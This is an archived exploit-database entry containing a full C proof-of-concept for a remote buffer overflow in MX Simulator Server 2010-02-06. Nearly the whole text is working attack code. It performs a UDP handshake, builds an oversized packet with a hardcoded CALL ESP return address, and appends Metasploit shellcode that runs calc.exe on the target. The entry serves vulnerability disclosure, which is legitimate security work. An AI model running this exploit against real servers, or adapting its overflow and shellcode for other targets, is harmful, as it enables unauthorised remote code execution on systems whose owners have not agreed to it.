MX Simulator Server 2010-02-06 Buffer Overflow

2010-03-23T00:00:00
ID PACKETSTORM:87543
Type packetstorm
Reporter Salvatore Fresta
Modified 2010-03-23T00:00:00

Description

                                        
                                            `  
  
/*  
  
MX Simulator Server 2010-02-06 Remote Buffer Overflow PoC  
  
This PoC will executes the calc.exe software on the remote  
system.  
The bug was discovered by Luigi Auriemma (www.aluigi.org)  
  
Copyright 2010 Salvatore Fresta aka Drosophila  
  
This program is free software; you can redistribute it and/or  
modify it under the terms of the GNU General Public License  
as published by the Free Software Foundation; either version   
2 of the License, or (at your option) any later version.  
  
This program is distributed in the hope that it will be  
useful, but WITHOUT ANY WARRANTY; without even the implied  
warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR  
PURPOSE. See the GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public  
License along with this program; if not, write to the Free  
Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,  
MA 02111-1307 USA  
  
http://www.gnu.org/licenses/gpl-2.0.txt  
  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <time.h>  
  
#ifdef WIN32  
#include <winsock.h>  
#include "winerr.h"  
  
#define close closesocket  
#else  
#include <unistd.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <arpa/inet.h>  
#include <netinet/in.h>  
#include <netdb.h>  
#endif  
  
#define BUFFSZ 1024  
#define PORT 19800  
  
/*  
* windows/exec - 511 bytes  
* http://www.metasploit.com  
* Encoder: x86/alpha_mixed  
* EXITFUNC=process, CMD=calc.exe  
*/  
#define shellcode \  
"\xb8\x9e\xef\xf3\x90\x31\xc9\xb1\x33\xd9\xc2\xd9\x74\x24\xf4" \  
"\x5b\x31\x43\x0e\x83\xc3\x04\x03\xdd\xe5\x11\x65\x1d\x11\x5c" \  
"\x86\xdd\xe2\x3f\x0e\x38\xd3\x6d\x74\x49\x46\xa2\xfe\x1f\x6b" \  
"\x49\x52\x8b\xf8\x3f\x7b\xbc\x49\xf5\x5d\xf3\x4a\x3b\x62\x5f" \  
"\x88\x5d\x1e\x9d\xdd\xbd\x1f\x6e\x10\xbf\x58\x92\xdb\xed\x31" \  
"\xd9\x4e\x02\x35\x9f\x52\x23\x99\x94\xeb\x5b\x9c\x6a\x9f\xd1" \  
"\x9f\xba\x30\x6d\xd7\x22\x3a\x29\xc8\x53\xef\x29\x34\x1a\x84" \  
"\x9a\xce\x9d\x4c\xd3\x2f\xac\xb0\xb8\x11\x01\x3d\xc0\x56\xa5" \  
"\xde\xb7\xac\xd6\x63\xc0\x76\xa5\xbf\x45\x6b\x0d\x4b\xfd\x4f" \  
"\xac\x98\x98\x04\xa2\x55\xee\x43\xa6\x68\x23\xf8\xd2\xe1\xc2" \  
"\x2f\x53\xb1\xe0\xeb\x38\x61\x88\xaa\xe4\xc4\xb5\xad\x40\xb8" \  
"\x13\xa5\x62\xad\x22\xe4\xe8\x30\xa6\x92\x55\x32\xb8\x9c\xf5" \  
"\x5b\x89\x17\x9a\x1c\x16\xf2\xdf\xd3\x5c\x5f\x49\x7c\x39\x35" \  
"\xc8\xe1\xba\xe3\x0e\x1c\x39\x06\xee\xdb\x21\x63\xeb\xa0\xe5" \  
"\x9f\x81\xb9\x83\x9f\x36\xb9\x81\xc3\xd9\x29\x49\x2a\x7c\xca" \  
"\xe8\x32"  
  
int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err);  
int timeout(int sock, int secs);  
unsigned int resolv(char *host);  
void std_err(void);  
  
  
  
int main(int argc, char *argv[]) {  
  
struct sockaddr_in peer;  
int sd,  
len;  
unsigned short port = PORT;  
unsigned char buff[BUFFSZ],  
*host = NULL,  
pkg[] =  
"\x03"  
"\x00\x00\x00\x00" // slot  
"\x00\x00\x00\x00" // session id  
"\x00\x00\x00\x00" // admin pwd crc  
"\x00\x00\x00\x00" // uid  
"000000000000000000000000" // ???  
"yz250f||||\n" // bike's model  
"999\n" // bike's number  
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"  
"\xd8\x69\x83\x7c" // EIP - CALL ESP (FFD4)  
shellcode;  
  
#ifdef WIN32  
WSADATA wsadata;  
WSAStartup(MAKEWORD(1,0), &wsadata);  
#endif  
  
if(argc < 2) {  
printf("\nMX Simulator Server 2010-02-06 Remote Buffer Overflow PoC - Salvatore Fresta\n"  
"http://www.salvatorefresta.net\n"  
"\n"  
"Usage: %s <target host> <port> (default: %hu)\n"  
"\n", argv[0], port);  
return -1;  
}  
  
host = argv[1];  
if(argc > 2) port = atoi(argv[2]);  
  
peer.sin_addr.s_addr = resolv(host);  
peer.sin_port = htons(port);  
peer.sin_family = AF_INET;  
  
printf("\n[*] Socket opening in progress...");  
  
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);  
if(sd < 0) {  
printf("\n[-] Unable to open a socket!\n\n");  
std_err();  
}  
  
printf("\n[+] Socket open successfully"  
"\n[*] Data sending in progress...");  
  
memset(buff, 0, 9);  
len = send_recv(sd, buff, 9, buff, BUFFSZ, &peer, 1);  
  
*(int *)(pkg + 1) = *(int *)(buff + 1);  
*(int *)(pkg + 5) = *(int *)(buff + 5);   
len = send_recv(sd, pkg, sizeof(pkg) - 1, buff, BUFFSZ, &peer, 0);  
  
printf("\n[+] Data sent successfully"  
"\n[+] Connection closed\n\n");  
  
close(sd);  
  
return 0;  
  
}  
  
  
  
int send_recv(int sd, unsigned char *in, int insz, unsigned char *out, int outsz, struct sockaddr_in *peer, int err) {  
  
int retry,  
len;  
  
if(in && !out) {  
fputc('.', stdout);  
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))  
< 0) std_err();  
return(0);  
}  
  
if(in) {  
for(retry = 2; retry; retry--) {  
fputc('.', stdout);  
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))  
< 0) std_err();  
if(!timeout(sd, 1)) break;  
}  
  
if(!retry) {  
if(!err) return(-1);  
printf("\nError: socket timeout, no reply received\n\n");  
exit(1);  
}  
} else {  
if(timeout(sd, 3) < 0) return(-1);  
}  
  
fputc('.', stdout);  
len = recvfrom(sd, out, outsz, 0, NULL, NULL);  
if(len < 0 && err) std_err();  
  
return len;  
  
}  
  
  
  
int timeout(int sock, int secs) {  
  
struct timeval tout;  
fd_set fd_read;  
int err;  
  
tout.tv_sec = secs;  
tout.tv_usec = 0;  
FD_ZERO(&fd_read);  
FD_SET(sock, &fd_read);  
err = select(sock + 1, &fd_read, NULL, NULL, &tout);  
if(err < 0) std_err();  
if(!err) return(-1);  
  
return 0;  
  
}  
  
  
  
unsigned int resolv(char *host) {  
  
struct hostent *hp = NULL;  
unsigned int host_ip;  
  
host_ip = inet_addr(host);  
if(host_ip == INADDR_NONE) {  
hp = gethostbyname(host);  
if(!hp) {  
printf("\nError: Unable to resolv hostname (%s)\n", host);  
exit(1);  
} else host_ip = *(unsigned int *)hp->h_addr;  
}  
  
return host_ip;  
  
}  
  
  
  
#ifndef WIN32  
void std_err(void) {  
perror("\nError");  
exit(1);  
}  
#endif  
  
  
  
`